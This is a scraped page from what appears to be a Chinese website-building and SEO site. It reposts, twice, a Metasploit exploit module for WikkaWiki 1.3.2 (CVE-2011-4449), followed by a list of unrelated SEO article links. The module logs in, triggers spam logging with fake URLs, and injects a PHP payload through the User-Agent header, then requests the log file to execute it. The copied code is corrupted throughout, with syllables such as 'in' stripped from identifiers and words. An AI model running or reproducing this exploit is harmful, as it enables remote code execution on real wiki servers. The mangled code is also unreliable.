WikkaWiki 1.3.2 Spam Logging PHP注射的方法
网站建设 2023-02-09 11:06www.1681989.com免费网站
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and mercial restrictions. Please see the Metasploit
# Framework web site for more formation on licensg and terms of use.
# http://metasploit./framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRankg
clude Msf::Exploit::Remote::HttpClient
def itialize(fo={})
super(update_fo(fo,
'Name' => "WikkaWiki 1.3.2 Spam Loggg PHP Injection",
'Description' => %q{
This module exploits a vulnerability found WikkaWiki. When the spam loggg
feature is enabled, it is possible to ject PHP code to the spam log file via the
UserAgent header , and then request it to execute our payload. There are at least
three different ways to trigger spam protection, this module does so by generatg
10 fake URLs a ment (by default, the max_new_ment_urls parameter is 6).
Please note that order to use the jection, you must manually pick a page
first that allows you to add a ment, and then set it as 'PAGE'.
},
'License' => MSF_LICENSE,
'Author' =>
[
'EgiX', #Initial discovery, PoC
'sn3r' #Metasploit
],
'References' =>
[
['CVE', '2011-4449'],
['OSVDB', '77391'],
['EDB', '18177'],
['URL', 'http:// .jb51. /trac/wikka/ticket/1098']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Arch' => ARCH_PHP,
'Platform' => ['php'],
'Targets' =>
[
['WikkaWiki 1.3.2 r1814', {}]
],
'Privileged' => false,
'DisclosureDate' => "Nov 30 2011",
'DefaultTarget' => 0))
register_options(
[
OptStrg.new('USERNAME', [true, 'WikkaWiki username']),
OptStrg.new('PASSWORD', [true, 'WikkaWiki password']),
OptStrg.new('PAGE', [true, 'Page to ject']),
OptStrg.new('TARGETURI', [true, 'The URI path to WikkaWiki', '/wikka/'])
], self.class)
end
def check
res = send_request_raw({
'method' => 'GET',
'uri' => "#{target_uri.path}wikka.php?wakka=HomePage"
})
if res and res.body =~ /Powered by WikkaWiki/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
#
# Get the cookie before we do any of that log/exploity stuff
#
def get_cookie
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php"
})
# Get the cookie this format:
# 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
raise RuntimeError, "#{@peer} - No cookie found, will not contue"
end
cookie
end
#
# Do log, and then return the cookie that contas our credential
#
def log(cookie)
# Send a request to the log page so we can obta some hidden values needed for log
uri = "#{@base}wikka.php?wakka=UserSettgs"
res = send_request_raw({
'method' => 'GET',
'uri' => uri,
'cookie' => cookie
})
# Extract the hidden fields
log = {}
if res and res.body =~ /\<div id\=\"content\"\>.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>.+\<legend\>Log\/Register\<\/legend\>/m
fields = $1.scan(/\<put type\=\"hidden\" name\=\"(\w+)\" value\=\"(\w+)\" \/>/)
fields.each do |name, value|
log[name] = value
end
else
raise RuntimeError, "#{@peer} - Unable to fd the hidden fieldset required for log"
end
# Add the rest of fields required for log
log['action'] = 'log'
log['name'] = datastore['USERNAME']
log['password'] = datastore['PASSWORD']
log['do_redirect'] = 'on'
log['submit'] = "Log"
log['confpassword'] = ''
log['email'] = ''
port = (rport.to_i == 80) ? "" : ":#{rport}"
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}#{port}#{uri}" },
'vars_post' => log
})
if res and res.headers['Set-Cookie'] =~ /user_name/
user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || ""
pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || ""
cookie_cred = "#{cookie}; #{user}; #{pass}"
else
cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
raise RuntimeError, "#{@peer} - Unable to log with \"#{cred}\""
end
return cookie_cred
end
#
# After log, we ject the PHP payload
#
def ject_exec(cookie)
# Get the necessary fields order to post a ment
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_ments=1",
'cookie' => cookie
})
fields = {}
if res and res.body =~ /\<form action\=.+processment.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>/m
$1.scan(/\<put type\=\"hidden\" name\=\"(\w+)\" value\=\"(.+)\" \/>/).each do |n, v|
fields[n] = v
end
else
raise RuntimeError, "#{@peer} - Cannot get necessary fields before postg a ment"
end
# Generate enough URLs to trigger spam loggg
urls = ''
10.times do |i|
urls << "http://.#{rand_text_alpha_lower(rand(10)+6)}.#{['', '', 'us', 'fo'].sample}\n"
end
# Add more fields
fields['body'] = urls
fields['submit'] = 'Add'
# Inject payload
b64_payload = Rex::Text.encode_base64(payload.encoded)
port = (rport.to_i == 80) ? "" : ":#{rport}"
uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addment"
post_data = ""
send_request_cgi({
'method' => 'POST',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addment",
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" },
'vars_post' => fields,
'agent' => "<?php #{payload.encoded} ?>"
})
send_request_raw({
'method' => 'GET',
'uri' => "#{@base}spamlog.txt.php"
})
end
def exploit
@peer = "#{rhost}:#{rport}"
@base = target_uri.path
@base << '/' if @base[-1, 1] != '/'
prt_status("#{@peer} - Gettg cookie")
cookie = get_cookie
prt_status("#{@peer} - Loggg ")
cred = log(cookie)
prt_status("#{@peer} - Triggerg spam loggg")
ject_exec(cred)
handler
end
end
=beg
For testg:
svn -r 1814 co https://wush./svn/wikka/trunk wikka
Open wikka.config.php, do:
'spam_loggg' => '1'
=end
# This file is part of the Metasploit Framework and may be subject to
# redistribution and mercial restrictions. Please see the Metasploit
# Framework web site for more formation on licensg and terms of use.
# http://metasploit./framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRankg
clude Msf::Exploit::Remote::HttpClient
def itialize(fo={})
super(update_fo(fo,
'Name' => "WikkaWiki 1.3.2 Spam Loggg PHP Injection",
'Description' => %q{
This module exploits a vulnerability found WikkaWiki. When the spam loggg
feature is enabled, it is possible to ject PHP code to the spam log file via the
UserAgent header , and then request it to execute our payload. There are at least
three different ways to trigger spam protection, this module does so by generatg
10 fake URLs a ment (by default, the max_new_ment_urls parameter is 6).
Please note that order to use the jection, you must manually pick a page
first that allows you to add a ment, and then set it as 'PAGE'.
},
'License' => MSF_LICENSE,
'Author' =>
[
'EgiX', #Initial discovery, PoC
'sn3r' #Metasploit
],
'References' =>
[
['CVE', '2011-4449'],
['OSVDB', '77391'],
['EDB', '18177'],
['URL', 'http:// .jb51. /trac/wikka/ticket/1098']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Arch' => ARCH_PHP,
'Platform' => ['php'],
'Targets' =>
[
['WikkaWiki 1.3.2 r1814', {}]
],
'Privileged' => false,
'DisclosureDate' => "Nov 30 2011",
'DefaultTarget' => 0))
register_options(
[
OptStrg.new('USERNAME', [true, 'WikkaWiki username']),
OptStrg.new('PASSWORD', [true, 'WikkaWiki password']),
OptStrg.new('PAGE', [true, 'Page to ject']),
OptStrg.new('TARGETURI', [true, 'The URI path to WikkaWiki', '/wikka/'])
], self.class)
end
def check
res = send_request_raw({
'method' => 'GET',
'uri' => "#{target_uri.path}wikka.php?wakka=HomePage"
})
if res and res.body =~ /Powered by WikkaWiki/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
#
# Get the cookie before we do any of that log/exploity stuff
#
def get_cookie
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php"
})
# Get the cookie this format:
# 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
raise RuntimeError, "#{@peer} - No cookie found, will not contue"
end
cookie
end
#
# Do log, and then return the cookie that contas our credential
#
def log(cookie)
# Send a request to the log page so we can obta some hidden values needed for log
uri = "#{@base}wikka.php?wakka=UserSettgs"
res = send_request_raw({
'method' => 'GET',
'uri' => uri,
'cookie' => cookie
})
# Extract the hidden fields
log = {}
if res and res.body =~ /\<div id\=\"content\"\>.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>.+\<legend\>Log\/Register\<\/legend\>/m
fields = $1.scan(/\<put type\=\"hidden\" name\=\"(\w+)\" value\=\"(\w+)\" \/>/)
fields.each do |name, value|
log[name] = value
end
else
raise RuntimeError, "#{@peer} - Unable to fd the hidden fieldset required for log"
end
# Add the rest of fields required for log
log['action'] = 'log'
log['name'] = datastore['USERNAME']
log['password'] = datastore['PASSWORD']
log['do_redirect'] = 'on'
log['submit'] = "Log"
log['confpassword'] = ''
log['email'] = ''
port = (rport.to_i == 80) ? "" : ":#{rport}"
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}#{port}#{uri}" },
'vars_post' => log
})
if res and res.headers['Set-Cookie'] =~ /user_name/
user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || ""
pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || ""
cookie_cred = "#{cookie}; #{user}; #{pass}"
else
cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
raise RuntimeError, "#{@peer} - Unable to log with \"#{cred}\""
end
return cookie_cred
end
#
# After log, we ject the PHP payload
#
def ject_exec(cookie)
# Get the necessary fields order to post a ment
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_ments=1",
'cookie' => cookie
})
fields = {}
if res and res.body =~ /\<form action\=.+processment.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>/m
$1.scan(/\<put type\=\"hidden\" name\=\"(\w+)\" value\=\"(.+)\" \/>/).each do |n, v|
fields[n] = v
end
else
raise RuntimeError, "#{@peer} - Cannot get necessary fields before postg a ment"
end
# Generate enough URLs to trigger spam loggg
urls = ''
10.times do |i|
urls << "http://.#{rand_text_alpha_lower(rand(10)+6)}.#{['', '', 'us', 'fo'].sample}\n"
end
# Add more fields
fields['body'] = urls
fields['submit'] = 'Add'
# Inject payload
b64_payload = Rex::Text.encode_base64(payload.encoded)
port = (rport.to_i == 80) ? "" : ":#{rport}"
uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addment"
post_data = ""
send_request_cgi({
'method' => 'POST',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addment",
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" },
'vars_post' => fields,
'agent' => "<?php #{payload.encoded} ?>"
})
send_request_raw({
'method' => 'GET',
'uri' => "#{@base}spamlog.txt.php"
})
end
def exploit
@peer = "#{rhost}:#{rport}"
@base = target_uri.path
@base << '/' if @base[-1, 1] != '/'
prt_status("#{@peer} - Gettg cookie")
cookie = get_cookie
prt_status("#{@peer} - Loggg ")
cred = log(cookie)
prt_status("#{@peer} - Triggerg spam loggg")
ject_exec(cred)
handler
end
end
=beg
For testg:
svn -r 1814 co https://wush./svn/wikka/trunk wikka
Open wikka.config.php, do:
'spam_loggg' => '1'
=end
网站设计
- 静宁会SEO的网站建设公司:全面提升您的网络影
- 提升在线业务的关键:选择最佳的丽水网站建设
- 浙江网站优化发展潜力如何
- 井研专业的网站建设公司:打造您的在线品牌
- 灵山SEO网站建设公司:提升您的在线业务表现
- 蒙城网站建设优化公司:提升您网站表现的理想
- 阳谷企业网站优化:提升线上业务力的关键
- 樟树专业的网站建设公司:打造您在线业务的坚
- 通河百度SEO排名的策略与技巧
- 重庆百度快照排名如何进行精准的客户引流
- 重庆百度快照排名
- 常宁便宜的建站公司:助您轻松打造在线业务
- 巫溪百度网站优化:提升网站曝光率与流量的关
- 湖北整站优化怎么做才能放大客户需求
- 闸北网站建设多少钱?全面解析与预算规划
- 辽宁企业网站优化怎么做电话营销